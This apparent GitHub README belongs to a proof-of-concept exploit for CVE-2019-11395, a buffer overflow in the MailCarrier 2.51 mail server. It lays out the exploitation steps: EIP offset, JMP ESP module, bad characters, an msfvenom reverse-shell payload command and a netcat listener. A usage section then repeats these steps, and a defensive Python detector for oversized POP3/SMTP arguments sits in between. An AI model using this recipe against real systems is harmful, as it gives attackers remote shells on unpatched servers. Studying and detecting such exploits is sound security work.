
CVE-2019-11395 PoC — Taps Lab MailCarrier Buffer Error Vulnerability

Associated Vulnerability
Title: Taps Lab MailCarrier Buffer Error Vulnerability (CVE-2019-11395)
Description: A buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long string, as demonstrated by SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR.
Description
An exploit for the CVE-2019-11395 vulnerability in the MailCarrier 2.51 email application, enabling remote code execution.
Readme
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
</head>

<body>
  <h1 align="center">CVE-2019-11395 Exploit 🛡️</h1>

  <h2>About CVE-2019-11395 🕵️</h2>

  <p>CVE-2019-11395 is a buffer overflow in the MailCarrier 2.51 email application that allows remote code execution. The overflow is reachable through the SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR command handlers.</p>

  <p>During an academic study, the POP3 handlers were chosen as the target for a Proof of Concept (PoC). Sending 6000 bytes to the application causes it to stop functioning, which confirms the buffer overflow.</p>

  <h2>Exploitation Steps 🔍</h2>

  <ol>
    <li>Used <code>msf-pattern_create -l 6000</code> to generate a cyclic pattern for locating the EIP overwrite.</li>
    <li>Identified the EIP offset with <code>msf-pattern_offset -q 6E47386E -l 6000</code>, resulting in an EIP offset of 5095.</li>
    <li>Identified <code>expsrv.dll</code> as a module loaded without ASLR, suitable as the source of a JMP ESP instruction.</li>
    <li>Identified bad characters <code>\x00\x0a\x0d</code> during tests for invalid characters.</li>
    <li>Generated payload with <code>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode</code>.</li>
    <li>Adjusted the <code>CVE-2019-11395.py</code> code to accommodate the payload.</li>
    <li>Opened connection with <code>nc -lnvp 4444</code> and executed the exploit (<code>CVE-2019-11395.py</code>) to gain access to the environment and validate the described CVE.</li>
  </ol>
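  <p>As an added defensive example (not part of this PoC repository or of the MailCarrier project), the Python script below flags oversized arguments sent to the command handlers the advisory names, so a mail gateway log or captured session can be screened for the kind of long-string input that triggers this overflow. The 512-byte alert threshold, the <code>check_command</code> and <code>scan_session</code> names, and the sample POP3/SMTP sessions are all constructed for illustration.</p>

```python
"""Added example, not the PoC's or MailCarrier's code: flag oversized
arguments to the command handlers CVE-2019-11395 names (SMTP RCPT TO,
POP3 USER, LIST, TOP, RETR). Threshold and sample sessions are constructed."""
import re

# Commands whose handlers the advisory names as overflow sinks, per protocol.
WATCHED = {
    "smtp": {"RCPT"},
    "pop3": {"USER", "LIST", "TOP", "RETR"},
}

# Assumed threshold: no legitimate mailbox name or message index approaches
# this size. The PoC sent 6000 bytes; alerting well below that also catches
# shorter padding attempts during offset hunting.
MAX_ARG_LEN = 512

# A client command line: verb, then an optional whitespace-separated argument.
LINE_RE = re.compile(r"^(?P<cmd>[A-Za-z]+)(?:\s+(?P<arg>.*))?$")


def check_command(protocol, line):
    """Return a finding dict for one client command line, or None if benign."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    cmd = m.group("cmd").upper()
    arg = m.group("arg") or ""
    if cmd not in WATCHED.get(protocol, set()):
        return None
    # Measure bytes on the wire, not characters; mail protocols are byte-oriented.
    arg_len = len(arg.encode("latin-1", "replace"))
    if arg_len <= MAX_ARG_LEN:
        return None
    return {
        "protocol": protocol,
        "command": cmd,
        "arg_len": arg_len,
        "reason": f"{cmd} argument of {arg_len} bytes exceeds {MAX_ARG_LEN}",
    }


def scan_session(protocol, lines):
    """Scan every client line of a session and return the list of findings."""
    return [f for f in (check_command(protocol, ln) for ln in lines) if f]


# Constructed sample sessions: a normal POP3 login, and two oversized commands
# shaped like the 6000-byte input the PoC describes.
BENIGN_POP3 = ["USER alice\r\n", "PASS hunter2\r\n", "LIST\r\n", "RETR 1\r\n", "QUIT\r\n"]
SUSPICIOUS_POP3 = ["USER " + "A" * 6000 + "\r\n"]
SUSPICIOUS_SMTP = [
    "HELO mail.example.test\r\n",
    "MAIL FROM:<a@example.test>\r\n",
    "RCPT TO:<" + "B" * 6000 + "@example.test>\r\n",
]

if __name__ == "__main__":
    for name, proto, session in [
        ("benign", "pop3", BENIGN_POP3),
        ("pop3-long-user", "pop3", SUSPICIOUS_POP3),
        ("smtp-long-rcpt", "smtp", SUSPICIOUS_SMTP),
    ]:
        findings = scan_session(proto, session)
        print(f"{name}: {len(findings)} finding(s)")
        for f in findings:
            print("  ", f["reason"])
```

  <p>Running the script reports no findings for the benign session and one finding each for the oversized <code>USER</code> and <code>RCPT</code> lines. The check is deliberately protocol-aware rather than a raw line-length rule, so that long but legitimate commands outside the vulnerable handlers do not raise alerts.</p>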

  <h2>Usage 🚀</h2>

  <p>Follow these steps to use the exploit:</p>

  <ol>
    <li>Generate the payload using <code>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode</code>.</li>
    <li>Copy the output of the <code>msfvenom</code> command.</li>
    <li>Adjust the <code>CVE-2019-11395.py</code> code to replace the <code>shellcode</code> variable with the output obtained from the <code>msfvenom</code> command.</li>
    <li>Execute the exploit (<code>CVE-2019-11395.py</code>) to gain access to the environment and validate the described CVE.</li>
  </ol>

  <h2>Compromised Environment 📸</h2>

  <img src="https://github.com/caioprince/CVE-2019-11395/blob/main/CVE-2019-11395.png" alt="PoC CVE-2019-11395" width="500">

  <section>
    <h2>🔗 Connect with me</h2>
    <p>Visit my profile on <a href="https://www.linkedin.com/in/caio-paiva-cyber-security/" target="_blank">LinkedIn</a></p>
  </section>
</body>

</html>